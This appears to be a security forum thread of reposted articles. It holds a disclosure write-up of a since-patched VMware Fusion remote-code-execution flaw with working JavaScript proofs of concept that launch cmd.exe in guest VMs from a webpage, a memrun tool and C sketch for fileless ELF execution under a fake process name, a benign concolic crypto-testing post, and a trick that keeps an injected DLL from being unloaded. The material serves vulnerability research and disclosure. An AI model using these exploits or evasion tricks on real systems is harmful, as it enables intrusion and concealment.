    2019-02-19 09:03:05:809 Renderer#ApiService::requestVMList: (url: http://localhost:8698/api/internal/vms )

This confirms the websocket and also a REST API interface.

REST API - Leaking VM info

If we navigate to the URL above (http://localhost:8698/api/internal/vms), we will get a nicely formatted JSON with the details of our VMs:

    [
      {
        "id": "XXXXXXXXXXXXXXXXXXXXXXXXXX",
        "processors": -1,
        "memory": -1,
        "path": "/Users/csaby/VM/Windows 10 x64wHVCI.vmwarevm/Windows 10 x64.vmx",
        "cachePath": "/Users/csaby/VM/Windows 10 x64wHVCI.vmwarevm/startMenu.plist",
        "powerState": "unknown"
      }
    ]

This is already an information leak, where an attacker can get information about our user ID, folders, VM names, and their basic configuration. The code below can be used to display this information. If we put this JS into any website, and a host running Fusion visits it, we can query the REST API:

    var url = 'http://localhost:8698/api/internal/vms'; // A local page
    var xhr = new XMLHttpRequest();
    xhr.open('GET', url, true);
    // If specified, responseType must be empty string or "text"
    xhr.responseType = 'text';
    xhr.onload = function () {
      if (xhr.readyState === xhr.DONE) {
        if (xhr.status === 200) {
          console.log(xhr.response);
          //console.log(xhr.responseText);
          document.write(xhr.response)
        }
      }
    };
    xhr.send(null);

If we look more closely at the code, we find these additional URLs, which leak further info:

- '/api/vms/' + vm.id + '/ip' - This will give you the internal IP of the VM, but it will not work on an encrypted VM or if it's powered off.
- '/api/internal/vms/' + vm.id - This is the same info you get via the first URL discussed, just limited to one VM.

Websocket - RCE with vmUUID

This is the original POC published by @CodeColorist:

    <script>
    ws = new WebSocket("ws://127.0.0.1:8698/ws");
    ws.onopen = function() {
      const payload = {
        "name": "menu.onAction",
        "object": "11 22 33 44 55 66 77 88-99 aa bb cc dd ee ff 00",
        "userInfo": {
          "action": "launchGuestApp:",
          "vmUUID": "11 22 33 44 55 66 77 88-99 aa bb cc dd ee ff 00",
          "representedObject": "cmd.exe"
        }
      };
      ws.send(JSON.stringify(payload));
    };
    ws.onmessage = function(data) {
      console.log(JSON.parse(data.data));
      ws.close();
    };
    </script>

In this POC you need the UUID of the VM to start an application. The vmUUID is the bios.uuid that you can find in the vmx file. The 'problem' with this is that you can't leak the vmUUID, and brute forcing it would be practically impossible. You need to have VMware Tools installed on the guest for this to work, but who doesn't have it? If the VM is suspended or shut down, VMware will nicely start it for us.
Also, the command will be queued until the user logs in, so even if the screen is locked we will be able to run the command once the user has logged in. After some experimentation I noticed that if I remove the object and vmUUID elements, the code execution still happens with the last used VM, so some state information is saved.

Websocket - infoleak

After reversing further and following what the websocket calls and what the other options in the code are, it became clear that you have full access to the application menu and can fully control everything. Checking the VMware Fusion binary reveals other menus with other options:

    aMenuupdate:     00000001003bedd2 db "menu.update", 0        ; DATA XREF=cfstring_menu_update
    aMenushow:       00000001003bedde db "menu.show", 0          ; DATA XREF=cfstring_menu_show
    aMenuupdatehotk: 00000001003bede8 db "menu.updateHotKey", 0  ; DATA XREF=cfstring_menu_updateHotKey
    aMenuonaction:   00000001003bedfa db "menu.onAction", 0      ; DATA XREF=cfstring_menu_onAction
    aMenurefresh:    00000001003bee08 db "menu.refresh", 0       ; DATA XREF=cfstring_menu_refresh
    aMenusettings:   00000001003bee15 db "menu.settings", 0      ; DATA XREF=cfstring_menu_settings
    aMenuselectinde: 00000001003bee23 db "menu.selectIndex", 0   ; DATA XREF=cfstring_menu_selectIndex
    aMenudidclose:   00000001003bee34 db "menu.didClose", 0      ; DATA XREF=cfstring_menu_didClose

These can all be called through the websocket. I didn't go ahead and explore every single option of every single menu, but you can pretty much do whatever you want (make snapshots, start VMs, delete VMs, etc.) if you know the vmUUID. This was a problem, as I hadn't figured out how to get that, and without it the attack isn't that useful.

The next interesting option was menu.refresh. If we use the following payload:

    const payload = {
      "name": "menu.refresh",
    };

we will get back some details about the VMs, pinned apps, etc.:

    {
      "key": "menu.update",
      "value": {
        "vmList": [
          {
            "name": "Kali 2018 Master (2018Q4)",
            "cachePath": "/Users/csaby/VM/Kali 2018 Master (2018Q4).vmwarevm/startMenu.plist"
          },
          {
            "name": "macOS 10.14",
            "cachePath": "/Users/csaby/VM/macOS 10.14.vmwarevm/startMenu.plist"
          },
          {
            "name": "Windows 10 x64",
            "cachePath": "/Users/csaby/VM/Windows 10 x64.vmwarevm/startMenu.plist"
          }
        ],
        "menu": {
          "pinnedApps": [],
          "frequentlyUsedApps": [
            {
              "rawIcons": [
                {
    (...)

This is more or less what we can already see through the REST API discussed earlier—so, more info leak.

Websocket - full RCE (without vmUUID)

The next interesting item was menu.selectIndex. It suggested that you can select VMs, and it even had related code in the app.asar file, which told me how to call it:

    // Called when VM selection changed
    selectIndex(index: number) {
      log.info('Renderer#ActionService::selectIndex: (index:', index, ')');
      if (this.checkIsFusionUIRunning()) {
        this.send({
          name: 'menu.selectIndex',
          userInfo: {
            selectedIndex: index
          }
        });
      }
    }

If we called this item, as suggested above, and then tried to launch an app in the guest, we could choose which guest to run the app in. Basically, we can select a VM with this call:

    const payload = {
      "name": "menu.selectIndex",
      "userInfo": {
        "selectedIndex": "3"
      }
    };

The next thing I tried was whether I could use the selectedIndex directly in the menu.onAction call, and it turned out that I can. It also became clear that the vmList returned by menu.refresh has the right order and indexes for each VM. In order to gain full RCE:

1. Leak the list of VMs with menu.refresh
2. Launch an application on the guest by using the index
The full POC:

    <script>
    ws = new WebSocket("ws://127.0.0.1:8698/ws");
    ws.onopen = function() {
      // payload to show vm names and cache path
      const payload = {
        "name": "menu.refresh",
      };
      ws.send(JSON.stringify(payload));
    };
    ws.onmessage = function(data) {
      //document.write(data.data);
      console.log(JSON.parse(data.data));
      var j_son = JSON.parse(data.data);
      var vmlist = j_son.value.vmList;
      var i;
      for (i = 0; i < vmlist.length; i++) {
        // payload to launch an app; you can use either the vmUUID or the selectedIndex
        const payload = {
          "name": "menu.onAction",
          "userInfo": {
            "action": "launchGuestApp:",
            "selectedIndex": i,
            "representedObject": "cmd.exe"
          }
        };
        if (vmlist[i].name.includes("Win") || vmlist[i].name.includes("win")) {
          ws.send(JSON.stringify(payload));
        }
      }
      ws.close();
    };
    </script>

Reporting to VMware

At this point I got in touch with @CodeColorist to ask whether he had reported this to VMware, and he said that yes, they had been in touch with him. I decided to send them another report anyway, as I found this pretty serious and wanted to urge them, especially because, compared to the original POC, I had found a way to execute the attack without the vmUUID.

The Fix

VMware released a fix and an advisory a couple of days ago: VMSA-2019-0005. I took a look at what they did, and essentially they implemented token authentication, where a new token is generated every time VMware starts. This is the related code for generating a token (taken from app.asar):

    String.prototype.pick = function(min, max) {
      var n, chars = '';
      if (typeof max === 'undefined') {
        n = min;
      } else {
        n = min + Math.floor(Math.random() * (max - min + 1));
      }
      for (var i = 0; i < n; i++) {
        chars += this.charAt(Math.floor(Math.random() * this.length));
      }
      return chars;
    };

    String.prototype.shuffle = function() {
      var array = this.split('');
      var tmp, current, top = array.length;
      if (top) while (--top) {
        current = Math.floor(Math.random() * (top + 1));
        tmp = array[current];
        array[current] = array[top];
        array[top] = tmp;
      }
      return array.join('');
    };

    export class Token {
      public static generate(): string {
        const specials = '!@#$%^&*()_+{}:"<>?|[];\',./`~';
        const lowercase = 'abcdefghijklmnopqrstuvwxyz';
        const uppercase = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ';
        const numbers = '0123456789';
        const all = specials + lowercase + uppercase + numbers;
        let token = '';
        token += specials.pick(1);
        token += lowercase.pick(1);
        token += uppercase.pick(1);
        token += numbers.pick(1);
        token += all.pick(5, 7);
        token = token.shuffle();
        return Buffer.from(token).toString('base64');
      }
    }

The token is a variable-length password containing at least one character from each of: symbols, lower case letters, upper case letters, and numbers. It is then base64 encoded; we can see it in Wireshark when VMware uses it, and we can also see it being used in the code:

    function sendVmrestReady() {
      log.info('Main#sendVmrestReady');
      if (mainWindow) {
        mainWindow.webContents.send('vmrestReady', [
          'ws://localhost:' + global['port'] + '/ws?token=' + token,
          'http://localhost:' + global['port'],
          '?token=' + token
        ]);
      }
    }

In case you have code execution on the Mac, you can probably figure this token out, but in that case it doesn't really matter anyway. The token will essentially limit the ability to exploit the vulnerability remotely. With some experiments, I also found that you need to set the Origin header to file://, otherwise the request is forbidden—and you can't set that via normal JS calls, as it is set by the browser.
Like this:

    Origin: file://

So even if you know the token, you can't trigger this via normal webpages.

Sursa: https://theevilbit.github.io/posts/vmware_fusion_11_guest_vm_rce_cve-2019-5514/
    1 point
  10. memrun

Small tool written in Golang to run ELF (x86_64) binaries from memory, with a given process name. Works on Linux where the kernel version is >= 3.17 (it relies on the memfd_create syscall).

Usage

Build it with $ go build memrun.go and execute it. The first argument is the process name (string) you want to see in, for example, ps auxww output. The second argument is the path of the ELF binary you want to run from memory.

    Usage: memrun process_name elf_binary

Sursa: https://github.com/guitmz/memrun
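For reference, the underlying technique can be sketched in a few lines of C—this is not memrun's Go source, just the memfd_create + fexecve idea it builds on (glibc 2.27+ assumed for the memfd_create wrapper):

    #define _GNU_SOURCE
    #include <fcntl.h>
    #include <stdio.h>
    #include <sys/mman.h>
    #include <sys/sendfile.h>
    #include <sys/stat.h>
    #include <unistd.h>

    int main(int argc, char *argv[]) {
        if (argc < 3) {
            fprintf(stderr, "usage: %s process_name elf_binary\n", argv[0]);
            return 1;
        }
        /* Anonymous in-memory file; the chosen name appears in /proc/<pid>. */
        int mfd = memfd_create(argv[1], 0);
        int elf = open(argv[2], O_RDONLY);
        if (mfd < 0 || elf < 0) { perror("open/memfd_create"); return 1; }

        /* Copy the on-disk ELF into the memory-backed fd. */
        struct stat st;
        fstat(elf, &st);
        if (sendfile(mfd, elf, NULL, st.st_size) != st.st_size) {
            perror("sendfile");
            return 1;
        }
        close(elf);

        /* Execute the in-memory image; argv[0] becomes the fake process name. */
        char *const args[] = { argv[1], NULL };
        char *const envp[] = { NULL };
        fexecve(mfd, args, envp);
        perror("fexecve");   /* only reached on failure */
        return 1;
    }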
    1 point
  11. Performing Concolic Execution on Cryptographic Primitives

Posted April 1, 2019 — Alan Cao

For my winternship and springternship at Trail of Bits, I researched novel techniques for symbolic execution on cryptographic protocols. I analyzed various implementation-level bugs in cryptographic libraries, and built a prototype Manticore-based concolic unit testing tool, Sandshrew, that analyzed C cryptographic primitives under a symbolic and concrete environment. Sandshrew is a first step toward letting crypto developers easily create powerful unit test cases for their implementations, backed by advancements in symbolic execution. While it can be used as a security tool to discover bugs, it can also be used as a framework for cryptographic verification.

Playing with Cryptographic Verification

When choosing and implementing crypto, our trust should lie in whether or not the implementation is formally verified. This is crucial, since crypto implementations often introduce new classes of bugs, like bignum vulnerabilities, which can appear probabilistically. Therefore, by ensuring verification, we are also ensuring functional correctness of our implementation. There are a few ways we could check our crypto for verification:

- Traditional fuzzing. We can use fuzz testing tools like AFL and libFuzzer. This is not optimal for coverage, as finding deeper classes of bugs requires time. In addition, since they are random tools, they aren't exactly "formal verification" so much as a stochastic approximation thereof.
- Extracting model abstractions. We can lift source code into cryptographic models that can be verified with proof languages. This requires learning purely academic tools and languages, and having a sound translation.
- Just use a verified implementation! Instead of trying to prove our code, let's just use something that is already formally verified, like Project Everest's HACL* library. This strips away configurability when designing protocols and applications, as we are limited to what the library offers (e.g., HACL* doesn't implement Bitcoin's secp256k1 curve).

What about symbolic execution? Due to its ability to exhaustively explore all paths in a program, using symbolic execution to analyze cryptographic libraries can be very beneficial. It can efficiently discover bugs, guarantee coverage, and ensure verification. However, this is still an immense area of research that has yielded only a sparse number of working implementations. Why? Because cryptographic primitives often rely on properties that a symbolic execution engine may not be able to emulate. These include the use of pseudorandom sources and platform-specific optimized assembly instructions. They contribute to complex SMT queries passed to the engine, resulting in path explosion and a significant slowdown during runtime.

One way to address this is concolic execution. Concolic execution mixes symbolic and concrete execution, where portions of code execution can be "concretized," or run without the presence of a symbolic executor. We harness this ability to concretize in order to maximize coverage of code paths without SMT timeouts, making this a viable strategy for approaching crypto verification.

Introducing sandshrew

After realizing the shortcomings of cryptographic symbolic execution, I decided to write a prototype concolic unit testing tool, sandshrew.
sandshrew verifies crypto by checking equivalence between a target unverified implementation and a benchmark verified implementation through small C test cases. These are then analyzed with concolic execution, using Manticore and Unicorn to execute instructions both symbolically and concretely.

[Fig 1. Sample OpenSSL test case with a SANDSHREW_* wrapper over the MD5() function.]

Writing Test Cases

We first write and compile a test case that tests an individual cryptographic primitive or function for equivalence against another implementation. The example shown in Figure 1 tests for a hash collision for a plaintext input, by implementing a libFuzzer-style wrapper over the MD5() function from OpenSSL. Wrappers signify to sandshrew that the primitive they wrap should be concretized during analysis.
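The figure itself is not reproduced here, but a test case in that style might look roughly like the sketch below. Only the SANDSHREW_* wrapper convention comes from the article; other_md5() and the harness details are hypothetical stand-ins for the second implementation being checked:

    #include <stdlib.h>
    #include <string.h>
    #include <openssl/md5.h>
    #include "other_md5.h"   /* hypothetical second MD5 implementation */

    /* SANDSHREW_* wrappers mark the primitives to be concretized. */
    void SANDSHREW_MD5_openssl(const unsigned char *in, size_t len,
                               unsigned char *out) {
        MD5(in, len, out);
    }

    void SANDSHREW_MD5_other(const unsigned char *in, size_t len,
                             unsigned char *out) {
        other_md5(in, len, out);
    }

    int main(int argc, char *argv[]) {
        unsigned char d1[MD5_DIGEST_LENGTH], d2[MD5_DIGEST_LENGTH];
        if (argc < 2) return 0;

        /* argv[1] is treated as symbolic input during analysis. */
        const unsigned char *input = (const unsigned char *)argv[1];
        size_t len = strlen(argv[1]);

        SANDSHREW_MD5_openssl(input, len, d1);
        SANDSHREW_MD5_other(input, len, d2);

        /* Equivalence check: the engine searches for an input on which
           the two implementations disagree. */
        if (memcmp(d1, d2, MD5_DIGEST_LENGTH) != 0)
            abort();
        return 0;
    }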
Performing Concretization

Sandshrew leverages a symbolic environment through the robust Manticore binary API. I implemented the manticore.resolve() feature for ELF symbol resolution and used it to determine memory locations of the user-written SANDSHREW_* functions from the GOT/PLT of the test case binary.

[Fig 2. Using Manticore's UnicornEmulator feature in order to concretize a call instruction to the target crypto primitive.]

Once Manticore resolves the wrapper functions, hooks are attached to the target crypto primitives in the binary for concretization. As seen in Figure 2, we then harness Manticore's Unicorn fallback instruction emulator, UnicornEmulator, to emulate the call instruction made to the crypto primitive. UnicornEmulator concretizes symbolic inputs in the current state, executes the instruction under Unicorn, and stores modified registers back into the Manticore state. All seems well, except for this: if all the symbolic inputs are concretized, what is left to be solved after the concretization of the call instruction?

Restoring Symbolic State

Before our program tests the implementations for equivalence, we introduce an unconstrained symbolic variable as the returned output of our concretized function. This variable guarantees a new symbolic input that continues to drive execution, but does not carry the previously collected constraints. Mathy Vanhoef (2018) takes this approach to analyze cryptographic protocols over the WPA2 protocol. We do this in order to avoid the problem of timeouts due to complex SMT queries.

[Fig 3. Writing a new unconstrained symbolic value into memory after concretization.]

As seen in Figure 3, this is implemented through the concrete_checker hook at the SANDSHREW_* symbol, which performs the unconstrained re-symbolication if the hook detects symbolic input being passed to the wrapper. Once symbolic state is restored, sandshrew is able to continue executing symbolically with Manticore, forking once it has reached the equivalence-checking portion of the program, and generating solver solutions.

Results

Here is Sandshrew performing analysis on the example MD5 hash collision program from earlier. The prototype implementation of Sandshrew currently exists here. With it comes a suite of test cases that check equivalence between a few real-world implementation libraries and the primitives that they implement.

Limitations

Sandshrew has a sizable test suite for critical cryptographic primitives. However, analysis still gets stuck on many of the test cases. This may be due to the large state space that needs to be explored for symbolic inputs. Arriving at a solution is probabilistic, as the Manticore z3 interface often times out.

With this, we can identify several areas of improvement for the future:

- Add support for allowing users to supply concrete input sets to check before symbolic execution. With a proper input generator (e.g., radamsa), this potentially hybridizes Sandshrew into a fuzzer as well.
- Implement Manticore function models for common cryptographic operations. This can increase performance during analysis and allows us to properly simulate execution under the Dolev-Yao verification model.
- Reduce unnecessary code branching using opportunistic state merging.

Conclusion

Sandshrew is an interesting approach to attacking the problem of cryptographic verification, and demonstrates the awesome features of the Manticore API for efficiently creating security testing tools. While it is still a prototype implementation and experimental, we invite you to contribute to its development, whether through optimizations or new example test cases.

Thank you

Working at Trail of Bits was an awesome experience, and offered me a lot of incentive to explore and learn new and exciting areas of security research. Working in an industry environment pushed me to understand difficult concepts and ideas, which I will take with me to my first year of college.

Sursa: https://blog.trailofbits.com/2019/04/01/performing-concolic-execution-on-cryptographic-primitives/
    1 point
  12. Make Your Dynamic Module Unfreeable (Anti-FreeLibrary)

1 minute read

Let's say your product injects a module into a target process. If the target process knows about the existence of your module, it can call the FreeLibrary function to unload it (assuming the reference count is one). One way to stay injected is to hook FreeLibrary and check the passed arguments every time the target process calls it. There is a way to get the same result without hooking.

When a process uses FreeLibrary to free a loaded module, FreeLibrary calls LdrUnloadDll, which is exported by ntdll. Inside LdrUnloadDll, the ProcessStaticImport field of the module's LDR_DATA_TABLE_ENTRY structure is checked to determine whether the module was dynamically loaded or not. The check happens inside the LdrpDecrementNodeLoadCountLockHeld function: if the ProcessStaticImport field is set, LdrpDecrementNodeLoadCountLockHeld returns without freeing the loaded module.

So, if we set the ProcessStaticImport field, FreeLibrary will not be able to unload our module. In this case, the demo module prints "Hello" every time it attaches to a process, and "Bye!" when it detaches.

Note: There is an officially supported way of doing the same thing: calling GetModuleHandleExA with the GET_MODULE_HANDLE_EX_FLAG_PIN flag. "The module stays loaded until the process is terminated, no matter how many times FreeLibrary is called."

Thanks to James Forshaw.

whoami: @_qaz_qaz

Sursa: https://secrary.com/Random/anti_FreeLibrary/
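A minimal sketch of that documented alternative, pinning the module from its own DllMain (a generic example, not the post's code):

    #include <windows.h>

    BOOL WINAPI DllMain(HINSTANCE hinstDll, DWORD reason, LPVOID reserved)
    {
        if (reason == DLL_PROCESS_ATTACH) {
            HMODULE self;
            // GET_MODULE_HANDLE_EX_FLAG_PIN keeps this module loaded until the
            // process terminates, no matter how many times FreeLibrary is called.
            // FROM_ADDRESS identifies the module by our own base address.
            GetModuleHandleExW(GET_MODULE_HANDLE_EX_FLAG_FROM_ADDRESS |
                               GET_MODULE_HANDLE_EX_FLAG_PIN,
                               (LPCWSTR)hinstDll, &self);
        }
        return TRUE;
    }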
    1 point